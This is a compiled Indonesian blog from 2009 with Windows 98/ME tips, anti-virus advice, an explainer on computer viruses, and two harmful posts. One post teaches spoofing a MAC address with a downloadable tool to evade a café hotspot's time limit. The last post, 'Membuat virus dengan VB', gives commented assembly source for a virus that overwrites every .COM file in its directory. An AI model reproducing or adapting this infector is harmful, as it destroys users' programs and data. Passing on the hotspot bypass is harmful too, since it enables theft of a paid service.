dalam Safe Mode dengan menekan tombol F8 sesaat sebelum Windows mulai
berjalan. Defrag lagi harddisk Anda dari mode ini.

130. Cari tahu apakah drive Anda FAT atau NTFS dengan mengklik kanan
drive tersebut dan memilih Properties kemudian masuk ke tab General. Baca
detail file system pada kotak dialog yang muncul.

131. Ubah sebuah drive dalam format FAT menjadi NTFS melalui DOS dengan
perintah convert c:/FS:NTFS. Masuklah dalam registry editor dan buka
direktori HKEY_USERS\DEFAULT\Control Panel\Desktop dan buat value dalam
AutoEndTask dengan nilai 1.

133. Jika saat menginstal sebuah driver baru komputer hang, restore
komputer ke konfigurasi sebelumnya. Caranya, restart komputer dan tekan F8
untuk masuk ke Safe Mode dan pilih option Last Known Good
Configuration.

134. Gunakan Event Viewer untuk melacak aplikasi yang error. Caranya,
klik kanan My Computer, pilih Manage dan klik event Viewer. Klik ganda
setiap aplikasi atau system yang menunjukkan error untuk melihat
informasi kesalahan.

135. Ada cara paling tepat untuk mengatur ketepatan jam di komputer.
Klik ganda jam di sebelah kanan bawah layar atau di system tray, pilih
tab Internet Time. Aktifkan option Automatically synchronize with an
Internet time server. Pilih server yang tersedia dan klik Update Now!

Tip dan Trik Spesial untuk Windows 98 dan ME

136. Back-up setting dial-up dengan cara men-drag and drop file koneksi
di folder Dial Up Networking ke sebuah floppy drive. File back-up akan
disimpan dalam ekstensi.dun.

137. Cara cepat restart, tekan Start|Shut Down|Restart, sementara klik
OK, tahan tombol Shift.

138. Gunakan Tweak UI khusus Windows 98 dari
http://www.microsoft.com/ntworkstation/downloads/powertoys/networking/nttweakui.asp. Setelah instalasi
selesai, buka Tweak UI melalui Control Panel.

139. Gunakan tombol F3 untuk membuka fitur Find saat berada di Windows
Explorer atau desktop.

140. Atur koneksi dial-up dengan Telephony Location Manager. Fitur
Telephony Location Manager ini akan membantu Anda mengoptimalkan koneksi
dial-up. Caranya, klik Start|Run dan ketikkan “tlocmgr” tanpa tanda
kutip.

141. Jika komputer Anda tidak bisa di-set Dalam mode standby atau
suspended, maka perbaiki dengan Pmtshoot dari
http://support.microsoft.com/?kbid=185949.

142. Selalu back-up registry sebelum melakukan perubahan di dalamnya.
Caranya, gunakan Registry Checker yang bisa ditemui di Start|Programs|
Accessories|System Tools|Tools.

143. Buat sebuah disket bootable untuk Windows 98 dengan cara
memformatnya menggunakan system files. Kemudian copy file
c:\windows\command\scanreg.exe dan c:\windows\himem.sys ke dalam disket tersebut. Jangan
lupa, edit file config.sys yang berada di disket dengan memberi tambahan
baris “device =a:\himem.sys” tanpa tanda kutip.
144. Untuk me-restore registry saat komputer tidak mau berjalan, coba
booting dengan boot disk. Kemudian masuk ke drive C:\ dan ketikkan
“scanreg\restore”, tanpa tanda kutip. Ikuti angkah-langkahnya hingga
selesai. Kemudian keluar dari DOS.

145. Tambahkan shortcut Control Panel ke Start Menu dengan mengklik
kanan tombol Start dan klik Open. Kemudian klik kanan di area kosong,
pilih New|Folder. Isikan “Control
Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” tanpa tanda kutip dan tekan Enter.

146. Anda bisa menghilangkan kotak dialog password yang muncul kali
pertama sebelum masuk dalam Windows. Caranya, masuk ke Control Panel, buka
Password dan buka tab Change Password. Isi kolom password lama dengan
password yang Anda miliki, dan kosongkan kolom new password. Setelah
itu, klik tab User Profiles dan enable option All users of this PC use the
same preferences and desktop settings. Perubahan ini akan berjalan
setelah Windows di-restart.

147. Untuk membatalkan perintah Print, buka icon Printer di system tray
dengan mengklik ganda. Kemudian sorot file yang sedang di-print pada
Window Printer dan klik kanan kemudian Cancel.

148. Temukan tool-tool under DOS yang masih layak dipergunakan dalam
folder tools\MSDOS di CD Instalasi Windows 98.

149. Jika Windows 98 atau Me berjalan lambat, periksa memory. Caranya,
klik kanan My Computer dan pilih Properties. Buka tab Performance dan
lihat System Resource. Jika mencapai 80 persen, restart komputer. Ingat,
tutup semua program sebelum melihat System Resource.

150. Gunakan Sysedit untuk mengedit file-file system. Misalnya
Autoexec.bat dan sebagainya. Ketikkan “sysedit” di kotak dialog Run tanpa
diberi tanda petik.

langowanutara.wordpress.com

•Mei 1, 2009 • Tinggalkan sebuah Komentar

6 tips membasm virus tanpa anti virus

•April 30, 2009 • Tinggalkan sebuah Komentar

Hal terpenting yang harus kita miliki sebenarnya bukan Antivirus yang super. Namun yang harus ada adalah “kemampuan” dan “pengetahuan” karena kedua unsur itulah yang akan menjadi “Antivirus Paling Super”. Fahami bagaimana virus bekerja, fahami sistem dan kamu akan tau bagaimana cara membasmi mereka. Jangan tunggu sampai terinfeksi, sedini mungkin berusahalah untuk melakukan pencegahan. Antivirus mungkin masih dibutuhkan untuk mencegah masuknya virus-virus lama, namun sekali lagi hal yang terpenting adalah “kemampuan” dan “pengetahuan”. Berikut ini tips-trik sederhana pencegahan seranagn virus yang mungkin bermanfaat untuk anda:

1. Waspadai file-file asing

– Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan sesuai. Beberapa virus meniru icon msword dan icon file-file gambar untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus w32/kumis.A misalnya.

– Jangan membuka file-file asing yang tidak kamu ketahui secara jelas asal usulnya dan dampak bagi komputermu.

– Jangan membuka folder yang dirasa asing. Pastikan apakah folder asing itu benar-benar folder ataukah file .exe yang memakai icon folder.

– Hati-hati terhadap file-file .vbs dan .bat yang terenkripsi. Sebelum menjalankannya sebaiknya decrypt dulu codenya (baca artikel “Tehnik Enkripsi Virus VBS” di artikel terdahulu).

– Waspada terhadap file-file web seperti html, htm, php, asp dll… Seelum kamu membuka file-file tersebut yang kamu dapat dari Internet, terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad. Setelah dirasa aman dari script asing, barulah buka dengan browser.

2. Periksa dan lindungi file-file system.

File-file .ini dan Autoexec.bat adalah sasaran empuk bagi virus. Kamu bisa melindungi file-file tersebut dari perubahan dengan menggunakan aplikasi pengaman komputer seperti FileVault (bisa kamu dapatkan di halaman Untility). Filevault disamping mengamankan data-data pentingmu juga akan mengamankan file-file system.

3. Disket

Dari hasil penelitian ternyata virus-virus yang paling meluas penyebarannya adalah virus yang mampu menyebarkan dirinya melalui disket. Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan lansung membuka disket dengan menggunakan Windows explorer!! Masuklah ke A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya. Why?? Karena file ini akan otomatis tereksekusi saat kamu membuka suatu folder atau drive.

4. Internet

– Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan browser lain yang lebih handal misalnya Mozilla Firefox.

– Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet (Baca artikel “Amankah Mendownload Screensaver dari Internet??”) dan program-program crack karena kebanyakan aplikasi tersebut disisipi trojan oleh pembuatnya.

– Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata) kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga “pengen” browsing ke situs-situs “ahli Neraka” tersebut, instal lah DeepFreeze terlebih dahulu dan aktifkan Frozen mode.

– Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri betapa lemahnya MSOUTLOOK. Gunakan EudoraMail.

5. Task Manager, MsCONFIG, StartUp, Registry

– Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihatlah aplikasi apa saja yang sedang berjalan, siapa tau ada “utusan” Virus disana. Jika ada aplikas asing, lansung ajah EndTask.

– Periksa juga MsConfig (start – Run ketik msconfig) pada tab startup. Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi yanga asing, segera hilangkan centang di kotak sebelahnya lalu masuklah ke registry (start – Run ketik regedit) dan hapus valuenya (baca artikel tentang registry di tutorial-tutorial sebelumnya).

– Direktory startup (start-programs-startup) juga harus sering-sering diperiksa karena semua file yang ada di direktory ini akan otomatis dijalankan saat windows startup. Jika ada file asing di directory ini, segera hapus!!

6. Trust NOBODY!!

Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau alasan lainnya.

Hack Hotspot

•April 29, 2009 • Tinggalkan sebuah Komentar

Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.

Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.

Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.

Apa itu MAC Adress ?

In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).

Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.

Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi. Ini adalah tempat favorit saya berinternet selain di Kampus Atma Jaya .

Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.

Kondisi yang saya hadapi adalah : saya ingin mengerjakan tugas kuliah di food court itu sembari makan dan minum dan saya membutuhkan akses internet.Untuk menyelesaikan tugas, saya dan teman-teman membutuhkan waktu lebih dari 3 jam.

Bagaimana menjebol Proteksi dengan MAC Address ?

Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://www.neset.com/download/?k-mac.zip

Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali

Pengertian Virus

•April 29, 2009 • Tinggalkan sebuah Komentar

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan

jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang

terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai

virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan

memahami tentang virus.

A.ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan ” teori self altering automata ”

yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori

yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori

tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat

program yang dapat memperbanyak dirinya dan dapat menghancurkan program

buatan lawan.Program yang mampu bertahan dan menghancurkan semua program

lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya

menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka

pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang

diciptakan makin lama makin berbahaya, sehingga mereka melakukan

pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama “virus” ini

berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di

dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

B.PENGERTIAN VIRUS

” A program that can infect other programs by modifying them to include

a slighty altered copy of itself.A virus can spread throughout a computer

system or network using the authorization of every user using it to

infect their programs. Every programs that gets infected can also act as

a virus that infection grows “

( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di

Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa

persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).

Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi

memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu

virus dibuat untuk menulari program-program lainnya, mengubah,

memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini,

virus hanya akan menulari apabila program pemicu atau program yang telah

terinfeksi tadi dieksekusi, disinilah perbedaannya dengan “worm”. Tulisan

ini tidak akan bahas worm karena nanti akan mengalihkan kita dari

pembahasan mengenai virus ini.

C.KRITERIA VIRUS

Suatu program yang disebut virus baru dapat dikatakan adalah benar benar

virus apabila minimal memiliki 5 kriteria :

1. Kemampuan suatu virus untuk mendapatkan informasi

2. Kemampuannya untuk memeriksa suatu program

3. Kemampuannya untuk menggandakan diri dan menularkan

4. Kemampuannya melakukan manipulasi

5. Kemampuannya untuk menyembunyikan diri.

Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap

-tiap kemampuan itu dan mengapa ini sangat diperlukan.

1.Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam

suatu directory, untuk apa? agar dia dapat mengenali program program apa

saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua

file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan

mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/

data semua file, terus memilahnya dengan mencari file-file yang bisa

ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi

atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan

pengumpulan data dan menaruhnya di RAM (biasanya 😛 ) , sehingga apabila

komputer dimatikan semua data hilang tetapi akan tercipta setiap program

bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

2.Kemampuan memeriksa suat program

Suatu virus juga harus bias untuk memeriksa suatu program yang akan

ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia

harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,

karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat

berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan

menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah

memiliki/ memberi tanda pada file/program yang telah terinfeksi

sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan

adalah misalnya memberikan suatu byte yang unik disetiap file yang

telah terinfeksi.

3.Kemampuan untuk menggandakan diri

Kalo ini emang virus “bang-get”, maksudnya tanpa ini tak adalah virus.

Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari

program lainnya. Suatu virus apabila telah menemukan calon korbannya

(baik file atau program) maka ia akan mengenalinya dengan memeriksanya,

jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari

dengan cara menuliskan byte pengenal pada program/ file tersebut,dan

seterusnya mengcopikan/menulis kode objek virus diatas file/program

yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk

menulari/ menggandakan dirinya adalah:

a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian

diciptakan suatu file menggunakan nama itu dengan menggunakan virus

tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)

b.Program virus yang sudah di eksekusi/load ke memori akan langsung

menulari file-file lain dengan cara menumpangi seluruh file/program

yang ada.

4.Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus

menulari suatu file/program. isi dari suatu rutin ini dapat beragam

mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan

untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini

memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,

sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem

operasi. misal:

a.Membuat gambar atau pesan pada monitor

b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari

drive di pc

c.Memanipulasi program/file yang ditulari

d.Merusak program/file

e.Mengacaukan kerja printer , dsb

5.Kemampuan Menyembunyikan diri

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua

pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.

langkah langkah yang biasa dilakukan adalah:

-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan

program lain yang dianggap berguna oleh pemakai.

-Program virus diletakkan pada Boot Record atau track yang jarang

diperhatikan oleh komputer itu sendiri

-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak

berubah ukurannya

-Virus tidak mengubah keterangan waktu suatu file, -dll

D.SIKLUS HIDUP VIRUS

Siklus hidup virus secara umum, melalui 4 tahap:

o Dormant phase ( Fase Istirahat/Tidur )

Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi

tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya

program lain, dsb. Tidak semua virus melalui fase ini

o Propagation phase ( Fase Penyebaran )

Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau

ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap

program yang terinfeksi akan menjadi hasil “klonning” virus tersebut

(tergantung cara virus tersebut menginfeksinya)

o Trigerring phase ( Fase Aktif )

Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa

kondisi seperti pada Dormant phase

o Execution phase ( Fase Eksekusi )

Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya.

Seperti menghapus file, menampilkan pesan-pesan, dsb

E.JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba

memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran

di dunia cyber.

1.Virus Makro

Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis

dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa

pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila

aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada

komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada

komputer bersistem operasi Mac.

contoh virus:

-variant W97M, misal W97M.Panther

panjang 1234 bytes,

akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.

-WM.Twno.A;TW

panjang 41984 bytes,

akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya

berekstensi *.DOT dan *.DOC

-dll

2.Virus Boot Sector

Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan

dirinya akan memindahkan atau menggantikan boot sector asli dengan program

booting virus. Sehingga saat terjadi booting maka virus akan di load kememori

dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar

(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar

eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain

selain drive c).

contoh virus :

-varian virus wyx

ex: wyx.C(B) menginfeksi boot record dan floopy ;

panjang :520 bytes;

karakteristik : memory resident dan terenkripsi)

-varian V-sign :

menginfeksi : Master boot record ;

panjang 520 bytes;

karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)

-Stoned.june 4th/ bloody!:

menginfeksi : Master boot record dan floopy;

panjang 520 bytes;

karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan

pesan”Bloody!june 4th 1989? setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus

Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal

dengan “Interrupt interceptor” . virus ini berkemampuan untuk mengendalikan

instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya

baik secara penuh ataupun ukurannya .

contoh virus:

-Yankee.XPEH.4928,

menginfeksi file *.COM dan *.EXE ;

panjang 4298 bytes;

karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu

-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth

dimasukkan pula disini), menginfeksi floopy an motherboot record;

panjang 520 bytes;

menetap di memori; ukuran dan virus tersembunyi.

-Vmem(s):

menginfeksi file file *.EXE, *.SYS, dan *.COM ;

panjang fie 3275 bytes;

karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.

-dll

4.Polymorphic Virus

Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu

berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah

strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,

menginfeksi file *.EXE dan *.COM;

panjang file 1963 bytes;

karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan

dapat berubah ubah struktur

-Nightfall,

menginfeksi file *.EXE;

panjang file 4554 bytes;

karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,

terenkripsidan dapat berubah-ubah struktur

-dll

5.Virus File/Program

Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,

baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi

dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus

Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya

pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-

file *.EXE dan juga menginfeksi Boot Sector.

F.BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus

computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai

cara, diantaranya:

1.Disket, media storage R/W

Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk

dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya.

Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk

ditumpangi virus dan dijadikan sebagai media penyebaran.

2.Jaringan ( LAN, WAN,dsb)

Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu

virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program

yang mengandung virus.

3.WWW (internet)

Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan

menginfeksi komputer-komputer yang mengaksesnya.

4.Software yang Freeware, Shareware atau bahkan Bajakan

Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di

sebarluaskan baik secara gratis, atau trial version yang tentunya sudah

tertanam virus didalamnya.

5.Attachment pada Email, transferring file

Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment

dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk

berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan

seringkali memiliki ekstensi ganda pada penamaan filenya.

G.PENANGULANGANNYA

1.Langkah-Langkah untuk Pencegahan

Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :

o Gunakan Antivirus yang anda percayai dengan updatean terbaru, tdak

perduli appun merknya asalkan selalu di update, dan nyalakan Auto protect

o Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan,

mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda

bekerja maka prosedur ini dapat dilewatkan.

o Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan

Antivirus anda dengan Firewall, Anti spamming, dsb

2.Langkah-Lagkah Apabila telah Terinfeksi

o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah disket,

jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda

mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable

dari control panel)

o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,

dengan cara:

– Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb

– Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan

berarti vius definition di computer anda tidak memiliki data virus ini,

cobalah update secara manual atau mendownload virus definitionnya untuk

anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya

maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus

updatean terbaru.

o Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan

segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs

-situs yang memberikan informasi perkembangan virus. Hal ini jika antivirus

update-an terbaru anda tidak berhasil memusnahkannya.

o Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat

ulang komputer anda .

PENUTUP

Semoga pembahasan mengenai Virus ini dapat memberikan manfaat khususnya

bagi penulis yang sedang belajar dan bagi kita semua umumnya, Tulisan

ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik

dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi.

REFERENSI

1.[ Stallings, William ],“CRYPTOGRAPHY AND NETWORK SECURITY,principle

and practice: second edition ” ,Prentice-Hall,Inc., New Jersey ,1999

2.[ Salim, IR.Hartojo ],“Virus Komputer, teknik pembuatan & langkah-

langkah penaggulangannya ,Andi OFFSET,Yogyakarta , 1989.

3.[ Amperiyanto, Tri ],“Bermain-main dengan Virus Macro”,Elex Media

Komputindo, Jakarta,2002

4.[ Jayakumar ], “ Viruspaperw.pdf ”, EBOOK version

5.[ y3dips ],“pernak pernik Virus”,http://ezine.echo.or.id,Jakarta,2003

6.“ Virus Definition dari salah satu Antivirus ”

Membuat virus dengan VB

•April 29, 2009 • Tinggalkan sebuah Komentar

Yang harus dipersiapkan terlebih dahulu adalah:

– Membuat satu folder pada C:\ dengan nama LAB atau nama lain yang
diinginkan. Salin debug.exe (gunakan fasilitas search pada folder
WINDOWS) ke dalam folder tersebut.
– Download dan install program TASM dan TLINK (silakan menggunakan
Google search engine)
– Install aplikasi VB 6.0

— 01 // Source code —————————————————-

Berikut adalah program virus yang ditulis dalam bahasa assembly beserta
komentar agar dapat mempermudah proses pembelajaran.

; PROG : TESVIRUS.ASM [Trivial Based] based on TOAD
; Efek : menginfeksi semua file berakhiran .COM yg ada didalam folder

draggy segment ; nama segmen (awal dari segmen),
; umumnya menggunakan code segment

assume cs:draggy,ds:draggy ; register cs dengan ds ke segment
org 100h ; daftar ke memori 100hex atau 256 bytes
; untuk mengcompile program ke format .com

TesVirus proc near ; identitas virus/prosedur

; ————————————————————————

mulai: ; nama label (bisa ditulis dgn nama apa saja,
; terserah anda yg penting anda mengerti)

mov ah,4eh ; move nilai 4e hex ke ah untuk general register

; ————————————————————————

cari_korban: ; nama label

xor cx,cx ; cx = 0 untuk general register utk set atribut
; file = normal, bisa juga dengan menggunakan
; mov cx,0 tetapi dapat membuat ukuran program
; menjadi lebih besar 3 bytes

lea dx,comsig ; L E A dari comsig ke dx
; atau move string ke dx untuk mencari
; spesifik file yg akan diinfeksi,
; bisa juga dengan menggunakan mov dx, offset
; comsig

int 21h ; eksekusi fungsi yang sudah di set
; untuk lebih lengkapnya, lihat tabel interrupt

jc jejakpendekar ; jc = jump if carry (jika program telah
; terinfeksi maka eksekusi rutin jejakpendekar
; (rutin untuk menampilkan pesan) jika carry
; flag = 1 tetapi bila flag = 0 maka
; jump ignore (rutin jejakpendekar tidak
; dieksekusi) dan lanjutkan ke baris berikut

; ————————————————————————

buka_bajunya: ; nama label

mov ax,3d02h ; asumsi program telah menemukan file yg akan
; diinfeksi maka 3d02h diload ke AX
; karena AX tipe registernya 16-bit yang isinya
; masing-masing 8 bit AH & AL maka AH=3dh & AL=02h,
; dengan kata lain 3d hex diload ke AH
; AL diload dengan 02 hex utk membuka file
; dengan mode read/write.

; note: – AL = 02h –> open the file in
; read/write mode
; – AL = 00h –> open it in read only
; – AL = 01h –> write only

mov dx,9eh ; load ASCii string ke dx untuk nama file yg
; akan diinfeksi letaknya ada di PSP di bagian
; DTA.
; PSP start di 00 hex,DTA start di 80 hex,
; file name ada di 1e hex di awal DTA
; jadi total offset ini : 1e+80=9e hex,

int 21h ; eksekusi

; ————————————————————————

perkosa_korban: ; nama label

xchg bx,ax ; di rutin sebelumnya pada saat
; file dibuka(open), komputer
; menempatkan perlakuan unik
; (unique file handle) dan disimpan
; ke dalam AX. Kita membutuhkan file handle
; itu di BX untuk fungsi write record
; jadi anda dapat menggunakan Exchange(xchg) AX
; ke BX {xchg bx,ax} atau
; bisa juga dengan menggunakan mov bx,ax tetapi
; ukuran program menjadi lebih besar 1 byte,
; [biasanya untuk pembuatan program virus, kita
; harus dapat mengoptimalkan kode program agar
; program yang dihasilkan ukurannya lebih kecil
; sehingga lebih hemat memori dan efektif.]

mov ah,40h ; load 40 hex ke AH

mov cx,offset target – offset mulai ; perintahkan komputer
; agar menghitung jarak antara
; offset mulai dengan offset target agar
; dapat diketahui berapa banyak bytes
; yg akan ditulis(write).
; jadi CX harus diload dgn jumlah bytes
; yg akan ditulis

lea dx,mulai ; load alamat mulai ke dx

int 21h ; eksekusi

; ————————————————————————

balikin_bajunya: ; nama label

mov ah,3eh ; setelah file telah terinfeksi maka tutup file
; korban (load 3eh ke ah) agar program virus ini
; dapat mulai mencari program lain untuk diinfeksi

int 21h ; eksekusi

mov ah,4fh ; load 4f ke AH

jmp cari_korban ; looping, lompat ke label cari_korban
; sampai ada file yang flagnya=1

; ————————————————————————

jejakpendekar: ; nama label

; rutin ini berguna untuk menampilkan pesan,
; juga sebagai tanda program virus telah selesai.
; jadi jika anda tidak ingin menggunakan rutin ini
; tidak apa-apa karena program virus ini masih
; dapat berjalan

mov ah,09h ; servis ke 9 untuk mencetak string

mov dx,offset pesanku ; teks yg akan didisplay pada layar harus
; diload dahulu ke dx (Data Register)
; jadi ambil alamat Offset pesanku

int 21h ; eksekusi

; ————————————————————————

keluar:

int 20h ; finish! kembali ke DOS.
; terminate operation tanpa menset register.
; cara lain terminate dgn menset register adalah:
; mov ax,4c00h menggunakan int 21h
; (Keterangan: 00=exit without error)

;——————————————————————————–

comsig db “*.com”,0 ; define data = comsig, 0 = akhir string
; comsig = signature file COM

pesanku db ’semua file *.com di direktori ini sudah diinfeksi’,10,13
; $ = akhir string
; 10,13 = pindah kebaris berikutnya
